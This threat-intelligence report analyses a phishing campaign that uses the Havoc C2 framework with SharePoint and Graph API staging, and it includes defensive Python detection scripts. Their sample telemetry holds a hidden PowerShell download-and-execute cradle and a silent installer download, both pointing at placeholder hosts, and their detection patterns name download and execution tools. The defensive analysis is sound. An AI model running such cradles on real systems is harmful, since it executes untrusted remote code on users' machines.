Full Report
A new phishing campaign has been identified using Havoc to control infected systems, leveraging SharePoint and Microsoft Graph API
Analysis Summary
# Tool/Technique: Havoc Command-and-Control (C2) Framework
## Overview
Havoc is an open-source command-and-control (C2) framework. In the phishing campaign described here, attackers use modified builds of its components, specifically the Havoc Demon agent, to control infected systems and route the implant's traffic through the Microsoft Graph API, using legitimate SharePoint file operations as the covert channel.
## Technical Details
- Type: Attack Tool / Framework (C2)
- Platform: Windows (not stated explicitly; the PowerShell delivery chain and the Demon DLL implant are Windows-specific)
- Capabilities: Remote command execution, data exfiltration, token manipulation, Kerberos attacks, C2 communication obfuscation via legitimate cloud APIs.
- First Seen: not stated explicitly; the campaign was reported on March 3, 2025.
## MITRE ATT&CK Mapping (Inferred from execution chain and use)
- TA0002 - Execution
- T1204 - User Execution
- T1204.002 - Malicious File (the `Documents.html` attachment and the ClickFix prompt)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell (initial downloader and installer script)
- T1059.006 - Python (shellcode loader stage)
- TA0005 - Defense Evasion
- T1497 - Virtualization/Sandbox Evasion (environment checks in the initial script)
- T1027 - Obfuscated Files or Information (API hashing in KaynLdr)
- T1620 - Reflective Code Loading (shellcode executed directly in memory)
- TA0003 - Persistence (registry modification; the specific key is not given)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTPS to the Microsoft Graph API)
- T1102 - Web Service
- T1102.002 - Bidirectional Communication (commands and results staged as SharePoint files)
- TA0010 - Exfiltration
- T1567 - Exfiltration Over Web Service
- T1567.002 - Exfiltration to Cloud Storage (SharePoint via the Graph API)
## Functionality
### Core Capabilities
- **Multi-Stage Infection Chain:** A phishing email carries an HTML attachment (`Documents.html`); opening it presents a ClickFix social-engineering prompt that talks the user into running a command, which starts the PowerShell stage.
- **PowerShell Execution:** The user-launched PowerShell command downloads a remote script that performs the initial setup.
- **Environment Verification:** The script checks whether it is running in a sandbox or analysis environment before continuing.
- **Dependency Handling:** Downloads and installs a Python interpreter if the host does not already have one.
- **Memory Execution:** Retrieves a hidden Python shellcode loader that maps and executes the next-stage shellcode directly in memory rather than dropping an executable to disk.
### Advanced Features
- **Obfuscation with KaynLdr:** Employs KaynLdr (a GitHub-hosted shellcode loader), which resolves the Windows API functions it needs by hash rather than by name, so the loader carries no import table or plaintext API strings for static analysis to key on.
- **Covert C2 Communication:** Uses a modified Havoc Demon DLL that talks to the C2 server only through the Microsoft Graph API, so the implant's traffic consists of SharePoint file operations against Microsoft's own endpoints.
- **Encrypted C2:** The Demon's traffic is encrypted with AES-256 in CTR mode before it is written to SharePoint, so the staged file contents are opaque to content inspection.
- **Persistence/Control:** Establishes persistence markers by modifying the system registry (the specific keys are not given).
- **File Staging on SharePoint:** Creates paired files in the victim's SharePoint document library: `{VictimID}pD9-tKout` carries output from the implant and `{VictimID}pD9-tKin` carries commands to it; the victim-specific prefix keys each implant's channel.
- **Post-Exploitation:** Capable of executing arbitrary commands, exfiltrating data, manipulating user tokens, and conducting Kerberos attacks.
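The delivery chain above (ClickFix launch, remote script download, sandbox check, Python install, in-memory loader) is visible host-side as a sequence of PowerShell script-block and command-line events. The following is an added example, not code from the original report or from the Havoc project: it correlates those stages per host over PowerShell telemetry. The log entries are constructed for illustration (the URLs are placeholders, not campaign infrastructure), and the regexes, the 300-second window and the three-stage threshold are assumptions to be tuned against real data.

```python
"""Heuristic correlation of the multi-stage PowerShell chain over
script-block text (Windows Event ID 4104) and process command lines.

Added example, not code from the original report or the Havoc project. The
log entries are constructed; URLs are placeholders. Regexes, window and
threshold are assumptions to tune against real telemetry.
"""
import re
from collections import defaultdict

# One heuristic per stage of the described chain. Matching a single stage is
# weak evidence (admins download files too); several within minutes is not.
HEURISTICS = [
    ("remote_download",
     re.compile(r"(Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|"
                r"DownloadFile|Net\.WebClient|Invoke-RestMethod|\birm\b)", re.I)),
    ("in_memory_exec",                       # pipe-to-IEX download cradle
     re.compile(r"(Invoke-Expression|\biex\b)", re.I)),
    ("sandbox_check",                        # VM/sandbox fingerprinting
     re.compile(r"(Win32_ComputerSystem|Win32_BIOS|Win32_VideoController|"
                r"TotalPhysicalMemory|NumberOfLogicalProcessors|VMware|"
                r"VirtualBox|Hyper-V|Sandbox)", re.I)),
    ("python_install",                       # fetching a Python installer
     re.compile(r"(python-\d[\w.]*(-amd64)?\.exe|python\.org/ftp)", re.I)),
    ("hidden_launch",                        # ClickFix-style launch flags
     re.compile(r"(-w(indowstyle)?\s+hidden|-nop\b|-noni\b|-ep\s+bypass|"
                r"-ExecutionPolicy\s+Bypass)", re.I)),
]

# Constructed sample telemetry: host, timestamp (seconds) and logged text.
SAMPLE_RECORDS = [
    {"host": "WS01", "ts": 0,
     "text": 'powershell -w hidden -c "iwr https://example.invalid/a.ps1 | iex"'},
    {"host": "WS01", "ts": 5,
     "text": "$cs = Get-CimInstance Win32_ComputerSystem; "
             "if ($cs.Model -match 'Virtual|VMware') { exit }"},
    {"host": "WS01", "ts": 20,
     "text": "if (-not (Get-Command python -ea SilentlyContinue)) { "
             "Invoke-WebRequest https://example.invalid/python-3.12.0-amd64.exe "
             "-OutFile $env:TEMP\\py.exe; Start-Process $env:TEMP\\py.exe -ArgumentList '/quiet' }"},
    {"host": "WS02", "ts": 100,
     "text": "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }"},
    {"host": "WS03", "ts": 200,              # a lone download: not enough on its own
     "text": "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv"},
]


def classify(text):
    """Return the set of chain-stage labels whose heuristic matches one entry."""
    return {label for label, pattern in HEURISTICS if pattern.search(text)}


def correlate(records, window=300, min_stages=3):
    """Slide a time window over each host's entries and report hosts where at
    least `min_stages` distinct stages of the chain occur within the window.
    Returns {host: sorted list of stage labels}."""
    by_host = defaultdict(list)
    for rec in records:
        labels = classify(rec["text"])
        if labels:
            by_host[rec["host"]].append((rec["ts"], labels))

    alerts = {}
    for host, events in by_host.items():
        events.sort(key=lambda e: e[0])
        for i, (start, _) in enumerate(events):
            seen = set()
            for ts, labels in events[i:]:
                if ts - start > window:
                    break
                seen |= labels
            if len(seen) >= min_stages:
                alerts[host] = sorted(seen)
                break
    return alerts


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_RECORDS).items():
        print(f"{host}: {len(stages)} chain stages within window: {', '.join(stages)}")
```

Script-block logging (Event ID 4104) must be enabled on the endpoints for the later stages to be visible; the first entry, the ClickFix launch line, is also available from process-creation logging (Event ID 4688 or Sysmon Event ID 1) when command-line capture is on. Only WS01 trips the three-stage threshold; the isolated download on WS03 does not.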
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names:
- Initial attachment: `Documents.html`
- SharePoint Data Files (example structure): `{VictimID}pD9-tKout`, `{VictimID}pD9-tKin`
- Registry Keys: [Mentioned as being modified, but specific keys are not provided]
- Network Indicators: C2 traffic goes to the Microsoft Graph API and the victim tenant's SharePoint URLs (defanged in the source as `[C2_domain]/sites/sharepoint_path`). Because the Graph API is served from Microsoft's own endpoints (graph.microsoft.com), blocking on destination domain or IP is not a usable control here; detection has to come from the tenant's audit telemetry and from the file names and access patterns inside SharePoint.
- Behavioral Indicators:
- Execution of unauthorized PowerShell scripts initiated by user interaction with an HTML attachment.
- Installation of a Python interpreter by a PowerShell-spawned process on a host that did not previously have one.
- Creation of unusual file names within user-accessible SharePoint document libraries.
- Network traffic patterned after legitimate Microsoft Graph API/SharePoint calls.
## Associated Threat Actors
- Not explicitly named in the article, but described as "bad actor groups" utilizing open-source frameworks with high sophistication.
## Detection Methods
- Signature-based detection: Less effective, because the tooling is open source and easily modified (the Demon DLL here is a custom build) and the transport is a legitimate Microsoft service.
- Behavioral detection: Necessary. Monitor the PowerShell execution flow (user-launched PowerShell, remote script download, interpreter install, in-memory execution) rather than any single stage.
- YARA rules: [Not provided in the text]
- **Specific Monitoring:** Monitor SharePoint file operations in the tenant's audit log (Unified Audit Log events such as FileUploaded, FileModified and FileAccessed) for the `{VictimID}pD9-tK*` naming convention and for files that are read or rewritten on a fixed timer.
- **API Security:** Advanced threat detection capable of identifying anomalous C2 activity hidden within Microsoft Graph API requests, which in practice means tenant-side telemetry (audit and sign-in logs, application consent), since the network destination is Microsoft itself.
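One way to act on the SharePoint monitoring point above, as an added example that is not the report's own code or a Microsoft-supplied query: scan audit records for the `{VictimID}pD9-tKout` / `{VictimID}pD9-tKin` convention, group hits by victim ID, and test whether the `tKin` file is read on a near-fixed timer, which is how a beacon polls for tasking. The records are constructed in the shape of Microsoft 365 Unified Audit Log SharePoint events (CreationTime, Operation, UserId, SourceFileName, ObjectId); the tenant name, the victim-ID format and the polling-regularity threshold are assumptions, and the report itself gives no check-in interval.

```python
"""Detection over SharePoint audit records for the staging files
`{VictimID}pD9-tKout` / `{VictimID}pD9-tKin`.

Added example, not the report's own code or a Microsoft query. Records are
constructed in the shape of Unified Audit Log SharePoint events; tenant name,
victim-ID format and the cadence threshold are assumptions.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Victim ID is any non-empty run of non-space characters (its real format is
# not given); the suffix is the one named in the report.
STAGING_NAME = re.compile(r"^(?P<victim>\S+?)pD9-tK(?P<direction>in|out)$")

# Constructed sample records (tenant and users are placeholders).
SITE = "https://example.sharepoint.invalid/personal/alice_example_invalid/Documents/"
SAMPLE_RECORDS = [
    {"CreationTime": "2025-03-03T09:00:00", "Operation": "FileUploaded",
     "UserId": "alice@example.invalid", "SourceFileName": "7f3a9c21pD9-tKout",
     "ObjectId": SITE + "7f3a9c21pD9-tKout"},
] + [
    {"CreationTime": t, "Operation": "FileAccessed",      # implant polling tKin
     "UserId": "alice@example.invalid", "SourceFileName": "7f3a9c21pD9-tKin",
     "ObjectId": SITE + "7f3a9c21pD9-tKin"}
    for t in ("2025-03-03T09:00:30", "2025-03-03T09:01:00",
              "2025-03-03T09:01:30", "2025-03-03T09:02:00")
] + [
    {"CreationTime": "2025-03-03T09:05:00", "Operation": "FileUploaded",
     "UserId": "alice@example.invalid", "SourceFileName": "Q1-budget.xlsx",
     "ObjectId": SITE + "Q1-budget.xlsx"},
    {"CreationTime": "2025-03-03T09:06:00", "Operation": "FileAccessed",
     "UserId": "bob@example.invalid", "SourceFileName": "notes.txt",
     "ObjectId": SITE + "notes.txt"},
]


def find_staging_files(records):
    """Yield (victim_id, direction, record) for every record whose file name
    matches the staging-file convention."""
    for rec in records:
        match = STAGING_NAME.match(rec.get("SourceFileName", ""))
        if match:
            yield match["victim"], match["direction"], rec


def polling_cadence(records, victim, min_events=4, max_cv=0.25):
    """Inter-event timing of operations on the victim's `tKin` file.
    Returns (mean_gap_seconds, coefficient_of_variation, is_regular), or None
    when there are too few events to judge. A low coefficient of variation
    means the file is touched on a timer rather than by a person."""
    times = sorted(datetime.fromisoformat(rec["CreationTime"])
                   for v, d, rec in find_staging_files(records)
                   if v == victim and d == "in")
    if len(times) < min_events:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    mean = statistics.fmean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean else float("inf")
    return mean, cv, cv <= max_cv


def report(records):
    """Summarise each victim ID seen: which accounts touched its files, which
    directions exist, how many events, and whether `tKin` is polled regularly."""
    victims = defaultdict(lambda: {"users": set(), "directions": set(), "events": 0})
    for victim, direction, rec in find_staging_files(records):
        info = victims[victim]
        info["users"].add(rec["UserId"])
        info["directions"].add(direction)
        info["events"] += 1
    for victim, info in victims.items():
        cadence = polling_cadence(records, victim)
        info["regular_polling"] = bool(cadence and cadence[2])
    return dict(victims)


if __name__ == "__main__":
    for victim, info in report(SAMPLE_RECORDS).items():
        print(f"victim {victim}: {info['events']} events, "
              f"directions={sorted(info['directions'])}, "
              f"users={sorted(info['users'])}, regular_polling={info['regular_polling']}")
```

The name match is the campaign-specific signal and will not survive a rename; the cadence check is the more general one, and can be applied to any extension-less file in a document library that a single account touches on a fixed interval.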
## Mitigation Strategies
- Train employees to recognize sophisticated phishing attempts, in particular ClickFix-style lures that instruct the user to paste and run a command.
- Restrict the execution of unauthorized PowerShell scripts: apply application control (WDAC or AppLocker) so that only signed or approved scripts run, and enable PowerShell script block and module logging so that what does run is recorded.
- Implement advanced threat detection capable of identifying command-and-control traffic masked as legitimate cloud service interactions.
- Proactively address API security risks related to Microsoft Graph API usage: review which applications and accounts in the tenant can call the Graph API and write to SharePoint document libraries, and alert on unexpected clients doing so.
## Related Tools/Techniques
- **ClickFix:** The social engineering tactic used to initiate the payload delivery.
- **KaynLdr:** A specific shellcode loader utilizing API hashing.
- **Havoc Demon Agent:** The modified C2 implant component.
- General use of legitimate cloud services (SharePoint, Microsoft Graph API) to blend in during C2 communication.